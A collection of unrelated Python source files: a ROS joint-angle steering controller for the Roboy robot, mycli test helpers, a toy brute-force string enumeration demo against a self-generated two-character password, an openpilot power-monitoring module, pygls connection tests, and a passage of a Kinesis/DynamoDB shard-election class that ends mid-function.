loaded_data["point_" + str(pointIterator)]["Right"][JOINT_SHOULDER_AXIS0_RIGHT])
_trajectoryShoulder1Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_SHOULDER_AXIS1_RIGHT])
_trajectoryShoulder2Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_SHOULDER_AXIS2_RIGHT])
_trajectoryElbow0Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_ELBOW_ROT0_RIGHT])
_trajectoryElbow1Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_ELBOW_ROT1_RIGHT])
_trajectoryWrist0Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_WRIST_0_RIGHT])
_trajectoryWrist1Right.append(
loaded_data["point_" + str(pointIterator)]["Right"][JOINT_WRIST_1_RIGHT])
_trajectoryShoulder0Left.append(
loaded_data["point_" + str(pointIterator)]["Left"][JOINT_SHOULDER_AXIS0_LEFT])
_trajectoryShoulder1Left.append(
loaded_data["point_" + str(pointIterator)]["Left"][JOINT_SHOULDER_AXIS1_LEFT])
_trajectoryShoulder2Left.append(
loaded_data["point_" + str(pointIterator)]["Left"][JOINT_SHOULDER_AXIS2_LEFT])
_trajectoryElbow0Left.append(
loaded_data["point_" + str(pointIterator)]["Left"][JOINT_ELBOW_ROT0_LEFT])
_trajectoryElbow1Left.append(
loaded_data["point_" + str(pointIterator)]["Left"][JOINT_ELBOW_ROT1_LEFT])
_trajectoryWrist0Left.append(loaded_data["point_" + str(pointIterator)]["Left"][JOINT_WRIST_0_LEFT])
_trajectoryWrist1Left.append(loaded_data["point_" + str(pointIterator)]["Left"][JOINT_WRIST_1_LEFT])
else:
print("WARNING: No point_%s in trajectory" % pointIterator)
_numTrajectoryPoints -= 1
if PRINT_DEBUG:
print("--------- Num trajectory points:")
print(_numTrajectoryPoints)
print("max_angle = ", max(_trajectorySteering))
print("min_angle = ", min(_trajectorySteering))
## Documentation for a function.
#
# Initializes the interpolation-functions for every joint-angle using
# cubic spline interpolation.
# The input value of the function is a steering angle and the output value of the function
# is the corresponding joint angle.
#
# The functions can be used by calling "<function_name>(<steering_angle>)"
# ==> returns <joint_angle>
def interpolate_joint_angles():
global _interpolatedShoulder0Right
global _interpolatedShoulder1Right
global _interpolatedShoulder2Right
global _interpolatedShoulder0Left
global _interpolatedShoulder1Left
global _interpolatedShoulder2Left
global _interpolatedElbow0Right
global _interpolatedElbow1Right
global _interpolatedElbow0Left
global _interpolatedElbow1Left
global _interpolatedWrist0Right
global _interpolatedWrist1Right
global _interpolatedWrist0Left
global _interpolatedWrist1Left
_interpolatedShoulder0Right = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder0Right, kind="cubic")
_interpolatedShoulder1Right = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder1Right, kind="cubic")
_interpolatedShoulder2Right = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder2Right, kind="cubic")
_interpolatedElbow0Right = interpolate.interp1d(_trajectorySteering, _trajectoryElbow0Right, kind="cubic")
_interpolatedElbow1Right = interpolate.interp1d(_trajectorySteering, _trajectoryElbow1Right, kind="cubic")
_interpolatedWrist0Right = interpolate.interp1d(_trajectorySteering, _trajectoryWrist0Right, kind="cubic")
_interpolatedWrist1Right = interpolate.interp1d(_trajectorySteering, _trajectoryWrist1Right, kind="cubic")
_interpolatedShoulder0Left = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder0Left, kind="cubic")
_interpolatedShoulder1Left = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder1Left, kind="cubic")
_interpolatedShoulder2Left = interpolate.interp1d(_trajectorySteering, _trajectoryShoulder2Left, kind="cubic")
_interpolatedElbow0Left = interpolate.interp1d(_trajectorySteering, _trajectoryElbow0Left, kind="cubic")
_interpolatedElbow1Left = interpolate.interp1d(_trajectorySteering, _trajectoryElbow1Left, kind="cubic")
_interpolatedWrist0Left = interpolate.interp1d(_trajectorySteering, _trajectoryWrist0Left, kind="cubic")
_interpolatedWrist1Left = interpolate.interp1d(_trajectorySteering, _trajectoryWrist1Left, kind="cubic")
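# Illustrative call (the value 0.25 is an example): _interpolatedShoulder0Right(0.25) returns the
# shoulder_axis0 target for a steering angle of 0.25 rad, provided 0.25 lies within the recorded
# steering range; scipy's interp1d raises ValueError for inputs outside that range.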
## Documentation for a function
#
# Returns the absolute difference of two angles, wrapped to the interval [0; pi]
def get_angle_difference(angle_1, angle_2):
return np.pi - np.abs(np.abs(angle_1 - angle_2) - np.pi)
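# Illustrative example: get_angle_difference(0.1, 2 * np.pi - 0.1) is approximately 0.2,
# i.e. the wrap-around at 2*pi is taken into account instead of returning ~6.08.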
## Documentation for a function
#
# Sets Kp of joint-controller to @proportional_value
# Sets Kd of joint-controller to @derivative_value
def set_joint_controller_parameters(proportional_value, derivative_value):
for thisJointName in _joints_list:
rospy.wait_for_service(thisJointName + '/' + thisJointName + '/params')
try:
joint_srv = rospy.ServiceProxy(thisJointName + '/' + thisJointName + '/params', SetControllerParameters)
joint_srv(proportional_value, derivative_value)
except rospy.ServiceException as e:
print("Service call joint_foot_left failed:", e)
## Documentation for a function
#
# Updates the global variable @requested_steering_angle when another node publishes a new
# requested steering_angle to the topic "/target_angle".
def update_steering_angle(steering_angle_F32):
global requested_steering_angle
requested_steering_angle = steering_angle_F32.data
if PRINT_DEBUG:
log_msg = "updating requested_steering_angle: " + str(requested_steering_angle)
print(log_msg)
## Documentation for a function.
#
# Checks if the parameter @steering_angle is within the range of
# reachable steering-angles of Roboy.
def check_steering_angle_range(steering_angle):
min_angle = min(_trajectorySteering)
max_angle = max(_trajectorySteering)
if min_angle <= steering_angle <= max_angle:
return True
else:
log_msg = "requested steering_angle (" + str(steering_angle) + ") out of range [" \
+ str(min_angle) + ";" + str(max_angle) + "]"
ros_log_error_pub.publish(log_msg)
return False
## Documentation for a function.
#
# Evaluates the corresponding joint-angle of @joint_name for the given @steering_angle
# using the interpolation-function of @joint_name
#
# Publishes the computed value to the corresponding ros-topic of @joint_name
# to apply position control.
#
# Waits until the joint_angle has reached requested joint_angle within
# error tolerance.
def publish_joint_angle(joint_name, steering_angle):
if check_steering_angle_range(steering_angle):
pub = None
f_interpolated = None
f_regressed = None
if joint_name == JOINT_SHOULDER_AXIS0_LEFT:
pub = ros_left_shoulder_axis0_pub
f_interpolated = _interpolatedShoulder0Left
f_regressed = _regressedShoulder0Left
elif joint_name == JOINT_SHOULDER_AXIS1_LEFT:
pub = ros_left_shoulder_axis1_pub
f_interpolated = _interpolatedShoulder1Left
f_regressed = _regressedShoulder1Left
elif joint_name == JOINT_SHOULDER_AXIS2_LEFT:
pub = ros_left_shoulder_axis2_pub
f_interpolated = _interpolatedShoulder2Left
f_regressed = _regressedShoulder2Left
elif joint_name == JOINT_SHOULDER_AXIS0_RIGHT:
pub = ros_right_shoulder_axis0_pub
f_interpolated = _interpolatedShoulder0Right
f_regressed = _regressedShoulder0Right
elif joint_name == JOINT_SHOULDER_AXIS1_RIGHT:
pub = ros_right_shoulder_axis1_pub
f_interpolated = _interpolatedShoulder1Right
f_regressed = _regressedShoulder1Right
elif joint_name == JOINT_SHOULDER_AXIS2_RIGHT:
pub = ros_right_shoulder_axis2_pub
f_interpolated = _interpolatedShoulder2Right
f_regressed = _regressedShoulder2Right
elif joint_name == JOINT_ELBOW_ROT0_LEFT:
pub = ros_elbow_left_rot0_pub
f_interpolated = _interpolatedElbow0Left
f_regressed = _regressedElbow0Left
elif joint_name == JOINT_ELBOW_ROT1_LEFT:
pub = ros_elbow_left_rot1_pub
f_interpolated = _interpolatedElbow1Left
f_regressed = _regressedElbow1Left
elif joint_name == JOINT_ELBOW_ROT0_RIGHT:
pub = ros_elbow_right_rot0_pub
f_interpolated = _interpolatedElbow0Right
f_regressed = _regressedElbow0Right
elif joint_name == JOINT_ELBOW_ROT1_RIGHT:
pub = ros_elbow_right_rot1_pub
f_interpolated = _interpolatedElbow1Right
f_regressed = _regressedElbow1Right
elif joint_name == JOINT_WRIST_0_LEFT:
pub = ros_left_wrist_0_pub
f_interpolated = _interpolatedWrist0Left
f_regressed = _regressedWrist0Left
elif joint_name == JOINT_WRIST_1_LEFT:
pub = ros_left_wrist_1_pub
f_interpolated = _interpolatedWrist1Left
f_regressed = _regressedWrist1Left
elif joint_name == JOINT_WRIST_0_RIGHT:
pub = ros_right_wrist_0_pub
f_interpolated = _interpolatedWrist0Right
f_regressed = _regressedWrist0Right
elif joint_name == JOINT_WRIST_1_RIGHT:
pub = ros_right_wrist_1_pub
f_interpolated = _interpolatedWrist1Right
f_regressed = _regressedWrist1Right
elif joint_name == JOINT_BIKE_FRONT:
pub = ros_bike_front_pub
else:
ros_log_error_pub.publish("Didn't catch joint_name in publish_joint_angle()")
target_joint_angle = None
if joint_name == JOINT_BIKE_FRONT:
target_joint_angle = steering_angle
else:
# target_joint_angle = f_interpolated(steering_angle)
target_joint_angle = f_regressed(steering_angle)
pub.publish(target_joint_angle)
if PRINT_DEBUG:
log_msg = "publishing " + str(target_joint_angle) + " to joint: " + joint_name
print(log_msg)
# ADDED THIS FOR FEEDBACK CONTROL
transition_end_time = time.time() + STEP_TRANSITION_TIME
while (time.time() < transition_end_time) and abs(
get_joint_position(joint_name) - target_joint_angle) > JOINT_TARGET_ERROR_TOLERANCE:
time.sleep(0.001) # Wait
# time.sleep(STEP_TRANSITION_TIME)
    else:
        global angle_change_successful
        angle_change_successful = False
## Documentation for a function.
#
# Controls the whole steering-process.
# Evaluates intermediate target_steering_angles between requested_steering_angle
# and current_steering_angle and creates a Thread for every joint, each of which
# is responsible for applying the corresponding joint-angle for the current
# target_steering_angle.
#
# Simplified Pseudo-code:
#
# while requested_steering_angle == current_steering_angle:
#
# sleep()
#
# if angle_difference(requested_steering_angle, current_steering_angle) > max_angle_change
#
# target_steering_angle = current_steering_angle + max_angle_change
#
# else:
#
# target_steering_angle = requested_steering_angle
#
# for joint in joint_list:
#
# Thread.publish_joint_angle(joint_name, target_joint_angle)
#
# for Thread in created_threads:
#
# Thread.join
#
# current_steering_angle = target_steering_angle
def steering_control():
rospy.Subscriber("/target_angle", Float64, update_steering_angle)
current_steering_angle = 0
global angle_change_successful
while not rospy.is_shutdown():
if requested_steering_angle == current_steering_angle:
if PRINT_DEBUG:
log_msg = "\nrequested_steering_angle = current_steering_angle = " + str(requested_steering_angle)
print(log_msg)
while requested_steering_angle == current_steering_angle:
time.sleep(UPDATE_FREQUENCY)
if PRINT_DEBUG:
log_msg = "\nrequested_steering_angle = " + str(requested_steering_angle)
log_msg += "\ncurrent_steering_angle = " + str(current_steering_angle)
print(log_msg)
if get_angle_difference(current_steering_angle, requested_steering_angle) > MAX_ANGLE_CHANGE:
target_steering_angle = 0
if current_steering_angle < requested_steering_angle:
target_steering_angle = current_steering_angle + MAX_ANGLE_CHANGE
else:
target_steering_angle = current_steering_angle - MAX_ANGLE_CHANGE
if PRINT_DEBUG:
log_msg = "target_steering_angle = " + str(target_steering_angle)
print(log_msg)
publisher_threads = []
i = 0
for joint in _joints_list:
publisher_threads.append(Thread(target=publish_joint_angle, args=(joint, target_steering_angle)))
publisher_threads[i].start()
i += 1
for thread in publisher_threads:
thread.join()
if angle_change_successful:
current_steering_angle = target_steering_angle
else:
print("Steering angle out of range: ", target_steering_angle)
angle_change_successful = True
else:
publisher_threads = []
i = 0
for joint in _joints_list:
publisher_threads.append(Thread(target=publish_joint_angle, args=(joint, requested_steering_angle)))
publisher_threads[i].start()
i += 1
for thread in publisher_threads:
thread.join()
if angle_change_successful:
current_steering_angle = requested_steering_angle
else:
print("Steering angle out of range: ", requested_steering_angle)
angle_change_successful = True
## Documentation for a function
#
# Initializes the Control-Node for Steering and starts Steering-Algorithm.
def main():
rospy.init_node('steering_simulation', anonymous=True)
rospy.Subscriber("joint_state", JointState, joint_state_callback)
import_joint_trajectory_record()
interpolate_joint_angles()
regress_joint_positions_from_file("trajectory_steering/saved_coefficients.json")
set_joint_controller_parameters(1000, 0)
steering_control()
if __name__ == '__main__':
main()
|
utils.py
|
import os
import time
import signal
import platform
import multiprocessing
import pymysql
import pytest
from mycli.main import special
PASSWORD = os.getenv('PYTEST_PASSWORD')
USER = os.getenv('PYTEST_USER', 'root')
HOST = os.getenv('PYTEST_HOST', 'localhost')
PORT = int(os.getenv('PYTEST_PORT', 3306))
CHARSET = os.getenv('PYTEST_CHARSET', 'utf8')
SSH_USER = os.getenv('PYTEST_SSH_USER', None)
SSH_HOST = os.getenv('PYTEST_SSH_HOST', None)
SSH_PORT = os.getenv('PYTEST_SSH_PORT', 22)
def db_connection(dbname=None):
conn = pymysql.connect(user=USER, host=HOST, port=PORT, database=dbname,
password=PASSWORD, charset=CHARSET,
local_infile=False)
conn.autocommit = True
return conn
try:
db_connection()
CAN_CONNECT_TO_DB = True
except:
CAN_CONNECT_TO_DB = False
dbtest = pytest.mark.skipif(
not CAN_CONNECT_TO_DB,
reason="Need a mysql instance at localhost accessible by user 'root'")
def create_db(dbname):
    with db_connection().cursor() as cur:
        try:
            cur.execute('''DROP DATABASE IF EXISTS {0}'''.format(dbname))
            cur.execute('''CREATE DATABASE {0}'''.format(dbname))
        except:
            pass
def run(executor, sql, rows_as_list=True):
"""Return string output for the sql to be run."""
result = []
for title, rows, headers, status in executor.run(sql):
rows = list(rows) if (rows_as_list and rows) else rows
result.append({'title': title, 'rows': rows, 'headers': headers,
'status': status})
return result
def set_expanded_output(is_expanded):
"""Pass-through for the tests."""
return special.set_expanded_output(is_expanded)
def is_expanded_output():
"""Pass-through for the tests."""
return special.is_expanded_output()
def send_ctrl_c_to_pid(pid, wait_seconds):
"""Sends a Ctrl-C like signal to the given `pid` after `wait_seconds`
seconds."""
time.sleep(wait_seconds)
system_name = platform.system()
if system_name == "Windows":
os.kill(pid, signal.CTRL_C_EVENT)
else:
os.kill(pid, signal.SIGINT)
def send_ctrl_c(wait_seconds):
"""Create a process that sends a Ctrl-C like signal to the current process
after `wait_seconds` seconds.
Returns the `multiprocessing.Process` created.
"""
ctrl_c_process = multiprocessing.Process(
target=send_ctrl_c_to_pid, args=(os.getpid(), wait_seconds)
)
ctrl_c_process.start()
return ctrl_c_process
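# Illustrative usage inside a test (the query is only an example):
#   ctrl_c_process = send_ctrl_c(wait_seconds=0.5)
#   run(executor, 'SELECT SLEEP(10)')  # expected to be interrupted by the simulated Ctrl-C
#   ctrl_c_process.join()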
|
bruteforce.py
|
import itertools
import string
import random
import sys
import multiprocessing
def bruteforce(charset, maxlen, startposition):
return (''.join(candidate)
for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
for i in range(startposition, maxlen + 1)))
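# Illustrative example: bruteforce('ab', maxlen=2, startposition=1) yields
# 'a', 'b', 'aa', 'ab', 'ba', 'bb' -- every string over the charset of length 1 to 2.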
alnum_charset = string.ascii_lowercase + string.ascii_uppercase + "0123456789"
alnumsymbol_charset = alnum_charset + "!@#$%^&*()-_+=[]{}|/.,;:'\"`~"
def gen_rand_password(charset, pass_len):
    return ''.join(charset[random.randrange(len(charset))] for i in range(pass_len))
def attempt_bruteforce(password, maxlen, startposition):
    for attempt in bruteforce(alnumsymbol_charset, maxlen, startposition):
        if attempt == password:
            print(attempt)
            sys.exit()
def main():
password = gen_rand_password(alnumsymbol_charset, 2)
jobs = []
procs = 8
    for i in range(0, procs):
        process = multiprocessing.Process(target=attempt_bruteforce, args=(password, 4, i))
process.daemon = True
jobs.append(process)
for j in jobs:
j.start()
for j in jobs:
j.join()
if __name__ == '__main__':
main()
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
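# (Illustrative derivation, assuming the filter is updated roughly every 0.5 s:
#  dt/tau = 0.5/5 = 0.1 and 0.1 / (0.1 + 1) ≈ 0.091, which matches the constant above.)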
# A C2 uses about 1W while idling, and 30h seems like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600
MIN_ON_TIME_S = 3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.car_voltage_instant_mV = 12e3 # Last value of pandaState voltage
self.integration_lock = threading.Lock()
self.ts_last_charging_ctrl = None
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = pandaState.pandaState.voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= (pandaState.pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected)
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
if pandaState is None or offroad_timestamp is None:
return False
if HARDWARE.get_battery_charging():
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 90 # 10 if LEON else 3
should_shutdown = False
# Wait until we have shut down charging before powering down
if (now - offroad_timestamp) < 10:
pass
elif HARDWARE.get_battery_capacity() < 5:
should_shutdown = True
else:
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= (HARDWARE.get_battery_capacity() < BATT_PERC_OFF)
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
    def charging_ctrl(self, msg, ts, to_discharge, to_charge):
        if self.ts_last_charging_ctrl is None or (ts - self.ts_last_charging_ctrl) >= 300.:
            battery_charging = HARDWARE.get_battery_charging()
            if self.ts_last_charging_ctrl:
                if msg.deviceState.batteryPercent >= to_discharge and battery_charging:
                    HARDWARE.set_battery_charging(False)
                elif msg.deviceState.batteryPercent <= to_charge and not battery_charging:
                    HARDWARE.set_battery_charging(True)
            self.ts_last_charging_ctrl = ts
|
test_server_connection.py
|
import asyncio
import os
from threading import Thread
from unittest.mock import Mock
import pytest
from pygls.server import LanguageServer
@pytest.mark.asyncio
async def test_tcp_connection_lost():
loop = asyncio.new_event_loop()
server = LanguageServer(loop=loop)
server.lsp.connection_made = Mock()
server.lsp.connection_lost = Mock()
# Run the server over TCP in a separate thread
server_thread = Thread(target=server.start_tcp, args=('127.0.0.1', 0, ))
server_thread.daemon = True
server_thread.start()
# Wait for server to be ready
while server._server is None:
await asyncio.sleep(.5)
# Simulate client's connection
port = server._server.sockets[0].getsockname()[1]
reader, writer = await asyncio.open_connection('127.0.0.1', port)
await asyncio.sleep(1)
assert server.lsp.connection_made.called
# Socket is closed (client's process is terminated)
writer.close()
await asyncio.sleep(1)
assert server.lsp.connection_lost.called
@pytest.mark.asyncio
async def test_io_connection_lost():
# Client to Server pipe.
csr, csw = os.pipe()
# Server to client pipe.
scr, scw = os.pipe()
server = LanguageServer(loop=asyncio.new_event_loop())
server.lsp.connection_made = Mock()
server_thread = Thread(
target=server.start_io,
args=(os.fdopen(csr, 'rb'), os.fdopen(scw, 'wb'))
)
server_thread.daemon = True
server_thread.start()
# Wait for server to be ready
while not server.lsp.connection_made.called:
await asyncio.sleep(.5)
# Pipe is closed (client's process is terminated)
os.close(csw)
server_thread.join()
|
ramps.py
|
import random
from queue import Queue
import json
from threading import Thread, Lock, Semaphore
import time
import uuid
import datetime
import logging
import boto3
from motorway.messages import Message
from motorway.ramp import Ramp
from boto3.dynamodb.conditions import Attr
shard_election_logger = logging.getLogger("motorway.contrib.amazon_kinesis.shard_election")
logger = logging.getLogger(__name__)
class NoItemsReturned(Exception):
pass
class KinesisRamp(Ramp):
stream_name = None
    heartbeat_timeout = 30  # Wait 30 seconds for a heartbeat update before considering the worker dead
MAX_UNCOMPLETED_ITEMS = 3000
GET_RECORDS_LIMIT = 1000
def __init__(self, shard_threads_enabled=True, **kwargs):
super(KinesisRamp, self).__init__(**kwargs)
self.conn = boto3.client(**self.connection_parameters('kinesis'))
assert self.stream_name, "Please define attribute stream_name on your KinesisRamp"
control_table_name = self.get_control_table_name()
self.worker_id = str(uuid.uuid4())
self.semaphore = Semaphore()
self.uncompleted_ids = {}
self.dynamodb_client = boto3.client(**self.connection_parameters('dynamodb'))
if shard_threads_enabled:
self.dynamodb = boto3.resource(**self.connection_parameters('dynamodb'))
try:
self.dynamodb_client.describe_table(TableName=control_table_name)
except self.dynamodb_client.exceptions.ResourceNotFoundException:
self.dynamodb_client.create_table(
TableName=control_table_name,
KeySchema=[
{
'AttributeName': 'shard_id',
'KeyType': 'HASH'
},
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
},
AttributeDefinitions=[
{
'AttributeName': 'shard_id',
'AttributeType': 'S'
},
],
)
self.dynamodb_client.get_waiter('table_exists').wait(TableName=control_table_name)
self.control_table = self.dynamodb.Table(control_table_name)
shards = self.conn.describe_stream(StreamName=self.stream_name)['StreamDescription']['Shards']
random.shuffle(shards) # Start the threads in random order, in case of bulk restart
threads = []
self.insertion_queue = Queue()
for i, shard in enumerate(shards):
self.uncompleted_ids[shard['ShardId']] = set()
t = Thread(target=self.process_shard, name="%s-%s" % (self.__class__.__name__, i), args=(shard['ShardId'], ))
threads.append(t)
t.start()
def get_control_table_name(self):
return 'pipeline-control-%s' % self.stream_name
def claim_shard(self, shard_id):
"""
Atomically update the shard in DynamoDB
:param shard_id:
:return: bool
"""
shard_election_logger.info("Claiming shard %s" % shard_id)
try:
control_record = self.control_table.get_item(Key={'shard_id': shard_id})['Item']
except KeyError:
raise NoItemsReturned()
control_record['worker_id'] = self.worker_id
control_record['heartbeat'] = 0
try:
self.control_table.put_item(Item=control_record,
ConditionExpression=Attr('shard_id').eq(shard_id) & Attr('checkpoint').eq(control_record['checkpoint'])
# ensure that the record was not changed between the get and put.
)
except self.dynamodb_client.exceptions.ConditionalCheckFailedException: # Someone else edited the record
shard_election_logger.debug("Failed to claim %s to %s" % (shard_id, self.worker_id))
return False
return True
def can_claim_shard(self, shard_id):
"""
Determine whether or not a given shard can be claimed because of
1) It's currently not being processed by another process
2) It's unevenly balanced between the consuming nodes/workers
:param shard_id:
:return: bool
"""
# =====================================
# | C L A I M S T A L E S H A R D S |
# =====================================
worker_heartbeats = {} # Store all heartbeats so we can compare them easily to track changes
control_record = None
shards = self.control_table.scan()['Items']
for shard in shards:
if shard['shard_id'] == shard_id:
control_record = dict(shard)
worker_heartbeats[shard['worker_id']] = shard['heartbeat']
if control_record is None:
raise NoItemsReturned()
worker_heartbeats[self.worker_id] = 0
time.sleep(self.heartbeat_timeout)
updated_control_record = self.control_table.get_item(Key={'shard_id': shard_id})['Item']
# Continue sleeping if heartbeat or worker id has changed
if control_record['heartbeat'] == updated_control_record['heartbeat'] and control_record['worker_id'] == updated_control_record['worker_id']:
            # if both the heartbeat and the worker_id are the same
shard_election_logger.debug("Shard %s - heartbeat and worker id remained unchanged for defined time, taking over" % shard_id)
return True
elif updated_control_record['worker_id'] != control_record['worker_id']:
shard_election_logger.debug("Shard %s - Worker id changed to %s, continue sleeping" % (shard_id, updated_control_record['worker_id']))
else:
shard_election_logger.debug("Shard %s - Heartbeat changed, continue sleeping" % shard_id)
# =====================
# | B A L A N C I N G |
# =====================
# Balance, if possible
active_workers = {
self.worker_id: True
}
# re-fetch the shards and compare the heartbeat
shards = self.control_table.scan()['Items']
for shard in shards: # Update active worker cache
if shard['worker_id'] in worker_heartbeats and worker_heartbeats[shard['worker_id']] == shard['heartbeat']:
active_workers[shard['worker_id']] = False
else:
active_workers[shard['worker_id']] = True
number_of_active_workers = sum([1 for is_active in active_workers.values() if is_active])
number_of_shards = len(shards)
optimal_number_of_shards_per_worker = number_of_shards // number_of_active_workers
workers = set([shard['worker_id'] for shard in shards])
shards_per_worker = {worker: sum([1 for shard in shards if shard['worker_id'] == worker]) for worker in workers}
for shard in shards:
if shard['shard_id'] == shard_id:
if (
# Check if the shards current worker has too many, or if the worker has no workers, then take
# the shard if the current worker has more than one shard!
shards_per_worker.get(shard['worker_id'], 0) > optimal_number_of_shards_per_worker or (
shards_per_worker.get(self.worker_id, 0) == 0 and
shards_per_worker.get(shard['worker_id'], 0) > 1
)
) and (
# Only get shards for balancing purposes, if we have too little
shards_per_worker.get(self.worker_id, 0) < optimal_number_of_shards_per_worker
):
shard_election_logger.debug("Taking over %s from %s" % (shard_id, shard['worker_id']))
return True
return False
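    # Illustrative example of the balancing rule above: with 6 shards and 2 active workers the
    # optimal share is 3 shards per worker; a shard whose current owner holds 4 shards can be
    # taken over by a worker that currently holds fewer than 3.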
def process_shard(self, shard_id):
"""
Every shard (at startup) has an active thread that runs this function to either consume or wait to be
ready to consume data from a shard
:param shard_id:
:return:
"""
while True:
try:
# try to claim the shard
try:
